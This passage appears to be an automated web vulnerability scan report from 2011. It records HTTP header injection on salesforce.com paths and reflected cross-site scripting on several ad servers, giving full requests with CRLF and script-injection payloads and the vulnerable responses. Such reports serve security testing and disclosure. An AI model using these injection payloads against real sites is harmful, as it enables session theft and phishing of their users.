s_sess=%20s_ppv_x%3D%3B%20s_cc%3Dtrue%3B%20c16%3Dflash%252010%257C%3B%20nve%3Dnve%3B%20v0%3DExternal%2520Websites%257Cburp%3B%20c22%3DExternal%2520Websites%3B%20v20%3DDirect%2520Landing%3B%20c24%3DExternal%2520Websites%257Cburp%3B%20c40%3DExternal%2520Websites%3B%20c48%3D12751%253A0%253A0%3B%20s_sq%3D%3B%20s_ppv%3D62%257C0%3B

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /def3f
f5e9ff33902
/
Date: Fri, 22 Apr 2011 15:29:58 GMT
Content-Length: 77

The URL has moved to <a href="/def3f
f5e9ff33902/">/def3f
f5e9ff33902/</a>

2.33. http://www.salesforce.com/platform [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salesforce.com
Path:   /platform

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload a3ace%0d%0a511c6f03f7c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /a3ace%0d%0a511c6f03f7c?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1 HTTP/1.1
Host: www.salesforce.com
Proxy-Connection: keep-alive
Referer: http://burp/show/2
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /a3ace
511c6f03f7c
/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1
Date: Fri, 22 Apr 2011 15:25:34 GMT
Content-Length: 191

The URL has moved to <a href="/a3ace
511c6f03f7c/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1">/a3ace
511c6f03f7c/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1</a>

2.34. http://www.salesforce.com/platform/210x147_rotatingbanner.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salesforce.com
Path:   /platform/210x147_rotatingbanner.swf

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 50940%0d%0a4462d617d22 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /platform/50940%0d%0a4462d617d22 HTTP/1.1
Host: www.salesforce.com
Proxy-Connection: keep-alive
Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: webact=%7B%22l_vdays%22%3A-1%2C%22l_visit%22%3A0%2C%22session%22%3A1303485889743%2C%22l_search%22%3A%22%22%2C%22l_dtype%22%3A%22%22%2C%22l_page%22%3A%22SFDC%3Aus%3Aplatform%22%2C%22counter%22%3A0%2C%22pv%22%3A1%2C%22f_visit%22%3A1303485889743%2C%22version%22%3A%22w170.1%22%2C%22rescoped%22%3Atrue%2C%22db%22%3A%7B%22name%22%3A%22media%20visions%22%2C%22size%22%3A%22vsb%22%2C%22ind%22%3A%22software%20%26%20technology%3Ahigh%20tech%22%7D%7D; fsr.a=1303485892905; mbox=check#true#1303485951|session#1303485890745-255084#1303487751|PC#1303485890745-255084.17#1304695494

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /platform/50940
4462d617d22
/
Date: Fri, 22 Apr 2011 15:27:56 GMT
Content-Length: 95

The URL has moved to <a href="/platform/50940
4462d617d22/">/platform/50940
4462d617d22/</a>

2.35. http://www.salesforce.com/platform/data/banner_rotation.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salesforce.com
Path:   /platform/data/banner_rotation.xml

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 29460%0d%0a27690dcd73b was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /platform/data/29460%0d%0a27690dcd73b HTTP/1.1
Host: www.salesforce.com
Proxy-Connection: keep-alive
Referer: http://www.salesforce.com/platform/210x147_rotatingbanner.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1303485951|session#1303485890745-255084#1303487751|PC#1303485890745-255084.17#1304695494; foresee.analytics=%7B%22rr_domain%22%3A%22www.salesforce.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221303485894523_6640%22%7D; fsr.s={"cp":{"siteLocale":"us","visitorType":"anonymous","segment":"non-customer:us","visitorTypeDetailed":"anonymous:no-trial","visitNumber":1,"previousPage":"SFDC:us:platform"}}; webact=%7B%22l_vdays%22%3A-1%2C%22l_visit%22%3A0%2C%22session%22%3A1303485889743%2C%22l_search%22%3A%22%22%2C%22l_dtype%22%3A%22%22%2C%22l_page%22%3A%22SFDC%3Aus%3Aplatform%22%2C%22counter%22%3A0%2C%22pv%22%3A1%2C%22f_visit%22%3A1303485889743%2C%22version%22%3A%22w170.1%22%2C%22rescoped%22%3Atrue%2C%22db%22%3A%7B%22name%22%3A%22media%20visions%22%2C%22size%22%3A%22vsb%22%2C%22ind%22%3A%22software%20%26%20technology%3Ahigh%20tech%22%7D%2C%22bar-expanded%22%3Atrue%7D; s_pers=%20v44%3DExternal%2520Websites%7C3233921094723%3B%20v30%3DExternal%2520Websites%257Cburp%7C3233921094725%3B; s_sess=%20s_ppv%3D0%3B%20s_ppv_x%3D%3B%20s_cc%3Dtrue%3B%20c16%3Dflash%252010%257C%3B%20nve%3Dnve%3B%20v0%3DExternal%2520Websites%257Cburp%3B%20c22%3DExternal%2520Websites%3B%20v20%3DDirect%2520Landing%3B%20c24%3DExternal%2520Websites%257Cburp%3B%20c40%3DExternal%2520Websites%3B%20c48%3D12751%253A0%253A0%3B%20s_sq%3D%3B; fsr.a=1303485895322

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /platform/data/29460
27690dcd73b
/
Date: Fri, 22 Apr 2011 15:29:39 GMT
Content-Length: 105

The URL has moved to <a href="/platform/data/29460
27690dcd73b/">/platform/data/29460
27690dcd73b/</a>

3. Cross-site scripting (reflected)  previous
There are 202 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://ad.doubleclick.net/adj/N3493.intergi.com/B5426713.10 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3493.intergi.com/B5426713.10

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53524'-alert(1)-'3d614a62ce1 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3493.intergi.com/B5426713.10;sz=53524'-alert(1)-'3d614a62ce1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 51503
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 22 Apr 2011 15:41:05 GMT
Expires: Fri, 22 Apr 2011 15:41:05 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
g=1;v=1;pid=62588931;aid=240047740;ko=0;cid=41735219;rid=41753006;rv=1;rn=1924468;";
this.swfParams = 'ct=US&st=VT&ac=802&zp=05672&bw=4&dma=25&city=17565&src=2059633&rv=1&rid=41753006&=53524'-alert(1)-'3d614a62ce1&';
this.renderingId = "41753006";
this.previewMode = (("%PreviewMode" == "true") ? true : false);
this.debugEventsMode = (("%DebugEventsMode" == "true")
...[SNIP]...

3.2. http://ads.adbrite.com/adserver/vdi/684339 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/684339

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 828af<script>alert(1)</script>33df1d10383 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/684339828af<script>alert(1)</script>33df1d10383?d=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=uHyDGHbZ&did=10500
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUio2Ki4yrDEsqEzLy6tJrDE0LKlS0lFKSszLSy3KBKtQqq0FAA%3D%3D"; srh="1%3Aq64FAA%3D%3D"; rb2=CiMKBjc0MjY5NxjBmaHVByITMjkzMTE0Mjk2MTY0NjYzNDc3NQo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZRAB; vsd=0@1@4db0cb91@searchportal.information.com; rb=0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Fri, 22 Apr 2011 17:51:23 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/684339828af<script>alert(1)</script>33df1d10383

3.3. http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.intergi.com
Path:   /adiframe/3.0/5205/1785959/0/170/ADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85d63"><script>alert(1)</script>ab732276e99 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe85d63"><script>alert(1)</script>ab732276e99/3.0/5205/1785959/0/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group] HTTP/1.1
Host: ads.intergi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 370

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://ads.intergi.com/addyn85d63"><script>alert(1)</script>ab732276e99/3.0/5205/1785959/0/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group];adiframe=y">
...[SNIP]...

3.4. http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.intergi.com
Path:   /adiframe/3.0/5205/1785959/0/170/ADTECH

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0eb2"><script>alert(1)</script>aac0eaedd2a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0f0eb2"><script>alert(1)</script>aac0eaedd2a/5205/1785959/0/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group] HTTP/1.1
Host: ads.intergi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 370

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://ads.intergi.com/addyn/3.0f0eb2"><script>alert(1)</script>aac0eaedd2a/5205/1785959/0/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group];adiframe=y">
...[SNIP]...

3.5. http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.intergi.com
Path:   /adiframe/3.0/5205/1785959/0/170/ADTECH

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fc4e"><script>alert(1)</script>33cec00506 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/52053fc4e"><script>alert(1)</script>33cec00506/1785959/0/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group] HTTP/1.1
Host: ads.intergi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 369

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://ads.intergi.com/addyn/3.0/52053fc4e"><script>alert(1)</script>33cec00506/1785959/0/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group];adiframe=y">
...[SNIP]...

3.6. http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.intergi.com
Path:   /adiframe/3.0/5205/1785959/0/170/ADTECH

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d80c0"><script>alert(1)</script>b217f28c29d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5205/1785959d80c0"><script>alert(1)</script>b217f28c29d/0/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group] HTTP/1.1
Host: ads.intergi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 370

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://ads.intergi.com/addyn/3.0/5205/1785959d80c0"><script>alert(1)</script>b217f28c29d/0/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group];adiframe=y">
...[SNIP]...

3.7. http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.intergi.com
Path:   /adiframe/3.0/5205/1785959/0/170/ADTECH

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ede19"><script>alert(1)</script>da26e51db9e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5205/1785959/0ede19"><script>alert(1)</script>da26e51db9e/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group] HTTP/1.1
Host: ads.intergi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 370

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://ads.intergi.com/addyn/3.0/5205/1785959/0ede19"><script>alert(1)</script>da26e51db9e/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group];adiframe=y">
...[SNIP]...

3.8. http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.intergi.com
Path:   /adiframe/3.0/5205/1785959/0/170/ADTECH

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c230"><script>alert(1)</script>92df9fceeea was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5205/1785959/0/1706c230"><script>alert(1)</script>92df9fceeea/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group] HTTP/1.1
Host: ads.intergi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 370

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://ads.intergi.com/addyn/3.0/5205/1785959/0/1706c230"><script>alert(1)</script>92df9fceeea/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group];adiframe=y">
...[SNIP]...

3.9. http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.intergi.com
Path:   /adiframe/3.0/5205/1785959/0/170/ADTECH

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34c3f"><script>alert(1)</script>68d2fa0cf19 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5205/1785959/0/170/ADTECH34c3f"><script>alert(1)</script>68d2fa0cf19;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group] HTTP/1.1
Host: ads.intergi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 370

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://ads.intergi.com/addyn/3.0/5205/1785959/0/170/ADTECH34c3f"><script>alert(1)</script>68d2fa0cf19;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group];adiframe=y">
...[SNIP]...

3.10. http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.intergi.com
Path:   /adiframe/3.0/5205/1785959/0/170/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e27a"><script>alert(1)</script>dac7ffab43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5205/1785959/0/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group]&1e27a"><script>alert(1)</script>dac7ffab43=1 HTTP/1.1
Host: ads.intergi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 372

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://ads.intergi.com/addyn/3.0/5205/1785959/0/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group]&1e27a"><script>alert(1)</script>dac7ffab43=1;adiframe=y">
...[SNIP]...

3.11. http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.intergi.com
Path:   /adiframe/3.0/5205/1785959/0/170/ADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96362"><script>alert(1)</script>af6646d0ffc was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5205/1785959/0/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group]96362"><script>alert(1)</script>af6646d0ffc HTTP/1.1
Host: ads.intergi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 370

